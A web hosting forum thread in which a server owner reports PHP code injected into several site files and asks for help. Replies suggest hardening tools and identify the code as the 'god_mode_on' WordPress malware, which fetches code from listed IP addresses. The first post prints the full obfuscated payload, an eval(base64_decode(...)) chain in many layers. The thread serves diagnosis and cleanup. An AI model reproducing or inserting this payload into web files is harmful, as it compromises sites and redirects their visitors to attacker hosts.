Has my server been hacked?

ChildOTK

Member
Aug 2, 2011
18
0
51
Good Day,

We noticed this morning some really suspicious code in our files:

Code:
/*god_mode_on*/eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVldwS1YwMUdVbGhTYmxKYVZUSjBkMXBVU21GTlYwcDBWR3BDYUZaNmJERlRWV00xWkRGc1dFNVlTbWhWTW1SeVYxYzFWMkpWZEZsak1uUmhUV3BzY2xkRVNYaGtiSEJJVmxka1VWVXdSbkpYUkVaUFVteFdjMWRyV2xaaVNFNXdWMnBKTldSc2NFUlRiVkpRWlZWS05scEZhRXRhYlU1MFZtNWthVkl3V25GWGJFNXVZVmRHU1ZOdGVHRmhWV3g2VTFjeGIyVldjRmhYVjJ4TlUwVTBkMWt5TlZOa2JVcElUMVJPWVZkRmJIWlRhMlJMVFZad2NHRXpUa3RTTURVeFdrVlpOV0l3ZEZWak1tUnFUVEZLTlZkRVRrdGlSMDVJWlVkb1drMXNWblpUVjNBelRESldTRTFZVGtwaFdHUndWVVZSTlU1SFNsaGtNbXhOVTBVMGQxa3lOVk5rYlVwSVQxUk9ZVmRGYkhaVGEyUkxUVlp3Y0dFelRrdFNNRFV4V2tWWk5VNUZkRlZqTW1SS1VqSjRkRk5WVG01aU1IQklWRzVXYTFKcWJIWlRWVkV3V2pBeGNHRXlNVXRoVjJSeVYxUkpNVTFHWjNwYU1tUlJWa1JDYmxSVlRuSmpSV3hKWXpKMFdtSnNXblJUVlZGM1dqQndTRnBJV21GU2Ftd3dXV3BLVTJKRmJFUk9SMlJMVWpCdmVGZHRjREJQVld4SlUyMTRhMU5HV2pWWmJXeENZVEZzZFZadE1WQmxWVWsxVTFWa1lVMVhTblJVYWtKb1ZucHNNVk5WVm10aVIxSkdUVmRvYVZZd1ZuWlRNV2g2WVRKS1dFOVVRbWhTTVZvMVUxVlJkMW93YkhWYVJFNXJaVlJXY1ZkdE1EQmtWMGw2VTIwMVNtRnVValZYYkdoVFRWZE9kRTVIWkV0U2VrWXlXa1ZrYjJKSFRuRmtSR3hwVFd0d2JWbDZUbE5oUjA1MVZWYzVTbUpVYkROWFZtTXhZMjFHVkZOWVFsQmxWa28yV1ZWak5VMHdiRVZOUjJSaFlsVmFlbGw2U2xaT01YQjFWbTVXV2sweFNuZFpha2t3V2pGc1dHRkhNV3RXTVVwMFdXdGtZVTVzY0VoaFJ6Rm9VMFV4ZGxOcmFFTmhSWFJaWkVjMWFWSjZiSEJYVm1ReldqQndTVlJ0T1dsTk1rMHpVMVZrYTJNeVNYbFRiV2hwVVRCR2NsZHFTVFZoTVdkNVRWaGFZVkl4VlROVFZVNVRaRVpzV0UxWGFFcFNSRUp1VldwS1YwMUdVbGhTYmxKYVZUSmtkMVF6YkZOaVYwWllaVWQ0U2xKRVFtNWFSbWhMWXpGd1dFNVhjR2xOYkVwelV6QlpOVnBzU25KaVJURlRWbXBzYlZNeFVqQmpSbkJ3VVZjNWFGZEZOVFpYYkdoU1lqQndSMDlXVWxOV2EzQllWV3hhUzFscmJISmhSbFpYVW10S2JWVXdWVFZXUmxwRVUyMVNURlV5ZHpOVGEyUnZaRzFOZWxWWFpGRlZNRVp5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlV3V2xOV1ZsWkhUMVZzVlUxVk5WWlRWM2QzVGpKYVdHSkhNVXBSTW1oM1dYcE9UMkpIVWtSYU1uUlpUVlUxUjFaWGVHRlNiRlp6WXpKc1ZtRXhXazlXUkVaVFVteG5kMUpyVmxOU2EyeHdWMFpPY21OSFZqVlZia0pxVVRCRk5WTlZUbE5hYkZWM1ZteE9WMkV4V2xSV00yeExWVEZLVmsxV1FsZFNWbHB0VlZaV1UxSldWbkJUYlZKUVRYcEdkMWR0YkVKaU1rWlpWRzV3WVZkR1JuWlRhMWsxVmtaS1YxTnNaRk5XYTNCcFUxZDBiMVpXV2tkUmJWcFdZVEZhU0ZWc1drdFNiRlp3VTIxU1RGVXlkek5UYTJoTFlrWndjRkZVYkVwVFJsbzFXV3RrVjJSV2EzbFBWM1JoVlRKa2NsZEVSazlTYkZaelYydGFWbUpJVG5CVk1GcFRWbFpXUjA5V1RsTldWbkJIVmxkMFYxVXdiSE5OU0VKUVRYcEdkMWR0YkVKaU1rWlpWRzV3WVZkR1JuWlRhMWsxVmtaS1YxTnNaRk5XYTNCcFUxZDBiMVpXV2tkUmJWcFhWbXMxUjFaWGR6VlJiRWwzVm1zNVYxRXdjR3RUTVU1elRqQndTVlp0YUVwU1JFSnVXa1pvUzJNeGNGaE9WM0JwVFd4S2MxTXdhRTlOUjA1MVZXNWFhVko2YTNwWGJHaEtZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpzV2s5U2JGWnpUMVZLVTAxR1dsQldhMDVMV2tWMFZHRjZaRzFWTVVsNFdUSXhNMW94UWxSUlYyeG9VMFpKZDFrd1VuWmthM2cxVTFka1RXRlZSbkpaTUdSR1dqQjRjRkZYYkUxTmFtd3pXVEJOTVdReVJrbFJVemxwVm5wcmQxbFZaRmRsVmtKVVUxZGtUV0ZXU2pCWFZtTjRZVVZzUkU1SFpFcGhWbkIwV1Zaa05HSkdRbFJUVjJSTllWVkdjbGR0TVhOak1YQlVVVmhXU2xFd2JIUlpWV00xWlcxU1JVMUhiRXBSZWxKdVUydGtiMlJ0VFhwVlYyUk5ZVlZHY0ZOdE1YTmtNVUpVVTFka1RXRlZSbkpaVm1oQ1dqQjRjRkZYYkV0aWEzQnpWMjF2ZDJGVmJFUk9SMlJMVTBWd2MxZHRiRUprVld4RVUxY3hhMVl3VlRWVFYyeENaRlZ3U1ZadGFGQk5iWGgwVXpCT1EySlhVbGhPVjNCclVqSjRNbGx0ZHpWaVIxWklZa2h3YTFORk1YWlRWekZQVFZkT2RHVkhXbWhXZWxaM1drVk9TbU5GYkVSaVJHUkxVakExZGxOVlVYZGFNV3Q2Vm01c2FWSnFiSGRaYlRGelRVVjBSRlZxUm1waVdHUjNWSHBLVDAxWFRuUmxSMXBxVFd4WmQxbHFUa05OUlhSRVZXMXdhRkV6Wkc1VlZFWlhWVEZTUms5V1JsZFNhbXhVVld4YVUxWnNWbkpPVmxaV1lUQmFVRlpVUW1GU2JGWndaREprVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVdTa3RXUmxaWFZVWmFWMVZZVGtwU1JURjNWRE5zVTAxWFNrbFZWMlJSVlRCS2NWcEdhRXRqTVdkNVZtcFNZVll3TVhaVGEyUlBZakIwVldSRWJFcFNNVnA2V1hwS1Zsb3lWalZWYWtacFUwWkdibFZHVGtOUlZuQjBZa2hPWVZacWJIVlhiR2hUV214cmVVOVlWbXRTTVZveFdrVm9UbUl3Y0VsV2JteHBVVEp6TTFwc1RrTmpSbkJ3VVZjNWFrMHhTalZaTUdNMVpXdDBSRlZxUm1sVFJrWjZVMWN4VjAxc2JGaGtNbXhNVlRCR2IxVkdVWGRhTVhCMFVtNU9hazFzVm5kYVdHeFRUbXRzUlUxSFpHcE5NVW8xVjBST1MySkhUa2hsUjJoYVRXeFdkbE5YTVZkTmJHeFlaREpzVFZFd2JIQlVSVTVUVFZkS1NWVllRbEJsVlVweldrY3hSMk13ZEVSVmFscE1Wa2hPYmxOcmFFOWlNa2w2V1RKa1VWVXdTWGRaTWpWWFlrVTVOVkZ1YkdGWFJrbDRXVEl3TUZveVVrbFRha1poVmtoUk5WTlZaSE5pVld4RVlVaHdhMU5GY0ROWmFrNU9ZakJ3U1ZadVRtdFJNMlJ3VjJ4a1MyUldiRlJUV0VKS1VUQlZOVlZHVGtOaVZteFlaVWh3WVZVeWR6TlRhMmgyV2pGQ1ZGRnVjR3RUUlhCdFdUSXhWMlF5U2toU2JYQmhWVEprY0Zkc1pFdGtWbXhVVTFoT1NtRlZiSHBUYTJoWFl6SlNSR0Y2WkVwUk1VcDFXV3BLVTFwdFNsaFBWM1JoVlRCRk5WTlZUbE5PYXprMVVWZDBhazF0YURKYVNHeENUMVZzU1ZWdWJHdFdNVlV6VTFWb1MySkhVa2xXYm14cFlWVkpkMWt5TlZkaVJUazFVVmQwV1UxVk5VZFdWM2hoVW14V2MyTXliR0ZOYW13eVYydE9TMXBGYkVWTlIyUkxVakpTTWxkcldUVmtSMGw1VlcxNFVHVlZTVFZUVldSWFl6Sk5lVlpYWkd4Tk1IQnpXa1ZvVjJWWFNuQlJiVEZhVmpOb05sZHNVakJQVjFwVVZXMHhXbGRHU25aWGJHaExXV3hvVkZGVWJFcFJNR3cwVkd0U1dtUlZNVlZhZWtaTllXdHJlRlJyVFRCbFZUVkZWbGRzVUdWV1NuUlhWbWhUWWpGd1dWTnRTbGxWTUVVMVUxVk9TbVZyTVZST1NHaFFVa1pHTVZSWGNGSmxWWGh4VWxoa1RtVlZhek5UYTJSaFlVZFNTR0ZIZUdwaVNGSnJVMVZSZDFvd2JIRmhNMmhOWVd0Vk1WUnRhekJsVlRGVlYxaFdUbFpHUlRCVFYzQjZZVEZ3ZEZKcVFtaFNNVm8xVm5wRmQxb3hRbFJSVjJ4UVZrVldNVlJXVW5KTmEzaHhVMWhvVDJGVVVYZFVNVTVLVGpGd2RFOVliR0ZXTUZweFdWVk9ibUV4Y0hSU2FrSm9VakZhTlZOVlpFZGxhMnhFVldwR2FtRlhkek5aVm1SYVdqQjBSRkZ0YUdoU01XOTRWMnRrWVdNeGNIVmpSM1JvVWpGd2Rsa3piRzVoTWxKWlUxaENTbEV5ZEc1YVdHeERZVmRPZEZadGFHaGxWVVV6V214bmVHTkdjSEJSVnpsTFUwVTFkbGxxVG1wYU1VSlZUVVJzU2xJeGNHOVphMmhQWWtWMFdXTXlkR3BOYXpVMVdWWm9RMDFHUWxSWmVtaHFUV3MxTlZsV2FFTk5Sa0oxVjIxb2FtRlZTbTFVVldodVRrWnNXRk5VVGxGV2JrNXdWMFZvYm1Wck1WZGxSRkpPWld4S2FscFZVazVOYkdoSldqTnNVMVp1WnpCVVdIQkhXVEpXUlZSVVVsbFRSMlEyVkd4YU5FNUZNWEpXYlU1c1VrVXhOVmRGYUc1bGF6VlhaVVJTVG1Wc1NtcGFWVkpMVW14b1NWb3pjRTVpU0djd1ZGaHdVMWt5VmtWVVZFWktZVmhrY0ZkRmFHNWxhekI0WlVSU1RtVnJXbXBhVlZKTFVteG9TVm96Y0U1V2JtY3dWRmh3YjFreVZrVlVWRUpaVTBka05WVnNXalJPUlRFMlUyMU9iRkpGTUhkWFJXaHVaV3N4YzJWRVVrNWhNVnBxV2xWU1RtVkdhRWxhTTNCT1VtNW5NRlJZY0U1aFZYaEVVMjFPYkZKRk1ERlhSV2h1WldzeFYyVkVVazVoTVZwcVdsVlNUbVZHYUVsYU0zQlFWbTVuTUZSWWNHRlpNbFpGVTJ0YVdWTkhaRFpVVjNnMFRrVXhObEp0VG14U1JUQjVWMFZvYm1WV1NsZGxSRkpPWld0YWFscFZVazVOUm1oSldqTndVRkV3YkhwVFYzZzBUa1V4Tm1KSFRteFNSVEUwVjBWb2JtVldTbGRsUkZKT1pXdGFhbHBWVWs1T1ZtaEpXak53VDJKSVp6QlVWM1JYV1RKV1JWUlliRmxUUjJRMlZGWmFORTVGTVRaWGJVNXNVa1Z3UjFkRmFHNWxhelZIWlVSU1RtVnRkSEJVUlU1TFdUSldSVmt6Y0ZsVFIyTjVWRlJHTkU1Rk5UWlRiVTVzVWtack1WZEZhRzVOTURGSFpVUlNUMlZzUm5CVVJVNUxXVEpXUlZkWWNGbFRSMk42VkZkNE5FNUZOWEZXYlU1c1VrWnNORmRGYUc1Tk1EVkhaVVJTVDJGc1dtcGFWVkpTVFZab1NWcDZTbEpOV0djd1ZHMXdWMWt5VmtWWGExWlpVMGRqZVZSc1dqUk9SVFZ5Vm0xT2JGSkhUWGRUVjJ3ellWWm9TVnA2VGs1TldHY3dWRzV3UzFreVZrVlhXSEJLWVZoa2NGZEZhRzVOYXpsSFpVUlNUMlZzU21wYVZWSnFUVVpvU1ZwNlRrNVNibWN3VkZSQ1Ixa3lWa1ZUYTJSWlUwZGtOVlZ0YkVwak1HeHpaVVJTVG1FeGNHcGFWVkpxWld4b1NWb3piRk5XYm1jd1ZHNXdRMWt5VmtWWFZGSlpVMGRqZWxSVlRrcGpNR3h6WlVSU1QyRnRhR3BhVlZKYVRWWm9TVnA2U2s1V2JtY3dWRzF3VW1GVmVFUlRiVTVzVWtacmVsZEZhRzVOYXpWWFpVUlNUMlZzU21wYVZWSlNUVlpvU1ZwNlNsSk5XR2N3Vkcxd1Yxa3lWa1ZYYTFaWlUwZGplVlJzV2pST1JUVnlWbTFPYkZKSFRYZFhSV2h1VFRBd2VHVkVVazlTUlhCcVdsVlNhazVXYUVsYWVrWlBVbTVuTUZSdGNFZFpNbFpGVjFST1dWTkhZM2RWYkZvMFRrVTFjVkp0VG14U1JuQkdWMFZvYmsxck5WUlRXRTVLWWtobk1GUnRjRWRaTWxaRldUTmtXVk5IWTNwVVZWbzBUa1UxY1ZadFRteFNSbkJIVjBWb2JrMXJOVWRsUkZKUFVrVTFhbHBWVWxwT1JtaEpXbnBLVUZadVp6QlViWFJQV1RKV1JWZFVRa3BpUkVFeldrY3hSMlZWYkVkUFNHUnNVakJXTmxSclVrWlBWbU40VDBoa2JGSkhhRzlYVjNCcldXc3hSMDFJVGxsbGEwa3dWREJrUjJGVk5IaGpNMmhaVlROb2JWUlZhRzVPUm14WVUxUk9XR1ZyY0d0VVJWazBaREpXUldGSGFGcGhiVkpwVkZSRmVGcEZPSGxYYmxwcVlWZG5lVmRXYUVwYU1rWlVVVzVDYVdGVlNtMVVWV2h2WVVVeE5sVllhRXhYU0ZGNVYxWm9TbG95Um5WVVZHeGhVbnBzY1ZwR1kzaGlSMHAxVlcxS1dXVnJTVEJVTUdSSFlWVTBlR042UmxsV2FrSjJWMGh3UTA1Rk9VaFNiV3hQVFZoTmQxZEdUbkpPTWtaMVZHMUtXV1ZyU1RCVU1HUkhZVlUwZUdONlNsbFdha0UxVjBod1EwNUZPVWhTYld4UFRWaE5lbGRHVGpCYWF6RkpZVWRvVG1Wc1JqUldla3B6V2tWemVFOUlaR3hTUjJodlYxZHdhMWxyT1VkTlJHUnJZbFZhTlZOVlpHOWlSbXhZVlZSc1lWSjZiSEZhUm1ONFlrZEtkVlZ0U2xsbGEwa3dWREJrUjJGVk5IaGpNMmhPVW1wR2ExTXdXVFJrTWxaRllVZG9XbUZ0VW1sVU1WbDNZMFprTmxGdFVsQk5iV2h6VjFaa1UxbHNhRFpSYWxKUVVqQmFjRlJxUm5wbFJURlhUVmRTVEZJelFqWlRNVkl3VDFWc1JXTjZhRTFOTURWeFdUSXhjMlF5VWtWT1J6VlFaVlZHYmxOclpHdGtiSEJIVDFoU2FVMXNTbk5UVlZGM1dqQndTVlJ0Y0dwaVYzZ3pXa1ZTTUU5VmJFUlZiVnBXVFVaYVZGWnRkRmRWTVdRMVUyMDFhVTFxYkhKVFYzZDNXakZDVkZGWGRHRk5hbXh5VjBSSmVHUnNjRWhXVkdSS1UwUkJPVWxwYTNCUGVVRTlJaWtwT3lBPSIpKTsg")); /*god_mode_off*/
When trying to decode the string it appears to be exactly the same code and looks like an endless loop.

Several files have this code added and the last modified date and time was this morning at 8:05am.

I checked /var/log/messages for activity around that time and the only think I could find was this:

Code:
Mar 15 08:05:47 w1 kernel: php[12447]: segfault at 00007fff806f6ae8 rip 00002b08051a1c38 rsp 00007fff806f6ad0 error 6
Does anybody have any idea what this is or what I can do about it?

I have IPTABLES setup as best I can on the server, and the logs didn't show any suspicious activity either, so I don't understand.

Thank you!
 

Infopro

Well-Known Member
May 20, 2003
17,090
518
613
Pennsylvania
cPanel Access Level
Root Administrator
Twitter
Suspend that account or accounts and hire a professional to assist you with this. My guess is that you have indeed been compromised.

There are many good System Admin Companies listed here:
Sys Admin Services « cPanel Application Catalog

Assisting with cleaning up a compromised server is a bit out of the scope of these, or any forums, really.
 

th3joker

Member
Mar 12, 2012
12
0
51
cPanel Access Level
Root Administrator
I would look at adding some or all of the following to harden the server:

CSF (Firewall) free and integrates with cpanel/whm quite nicely
fail2ban
portsentry
chkrootkit
rkhunter
securetmp
clam (Anti Virus)

In your hosts.allow add in your IP's then deny all services to everyone else except httpd.

hosts.allow on it's own isn't sufficient, you should have multiple levels of security.

If you need some help we can point you in the right direction.
 

th3joker

Member
Mar 12, 2012
12
0
51
cPanel Access Level
Root Administrator
Our original hosting was shared and the host company was useless we got hacked constantly and gave up and bought our own dedicated server in the end.

Our logs are full of hack attempts and port scans etc..
 

Infopro

Well-Known Member
May 20, 2003
17,090
518
613
Pennsylvania
cPanel Access Level
Root Administrator
Twitter
If the cPanel account or website password has been compromised you'll find it very tough to stop this sort of thing from happening. Scans to find vulnerable scripts and poke them are very common.

Keeping all scripts and mods to them, up to date, and using very strong passwords may still not be enough if the user gets infected on his local computer and all his passwords are stolen. And then used.

There's a lot more to Hosting than just putting up a server and adding a website. Lots more. If you're unsure of how to setup good security to help protect your work, hire someone. The cost of hiring a professional is much less than the grief you go thru once you've been hacked and all your customers move out, like th3joker has done.
 

alphawolf50

Well-Known Member
Apr 28, 2011
186
2
68
cPanel Access Level
Root Administrator
The base64 encoded string isn't an endless loop, just a long one. While you're getting this situation handled, it would be a good idea to block these specific IP addresses referenced by the attack code:

146.185.254.245
31.184.242.103
91.196.216.148
91.196.216.49

The script downloads some (unknown) code from those IP addresses and injects it into your pages. If it can't do that, it injects some javascript into the pages instead. The javascript looks like it tries to direct the client to one of those IP addresses.

This seems to be a WordPress exploit. This thread at wordpress.org has lots of information regarding how to clean up the issue, and how you might have gotten infected:

WordPress › Support » I think my site has been hacked. Please Help ASAP?
 

wpchamp

Registered
Mar 20, 2012
1
0
51
cPanel Access Level
Website Owner
Hello there,

It appears you have been hit with the "god mode on" wordpress virus. There's a good guide on how to get rid of it here:

/http://marketingsiden.dk/how-to-remove-god_mode_on-wordpress-virus/

Best Regards
wpchamp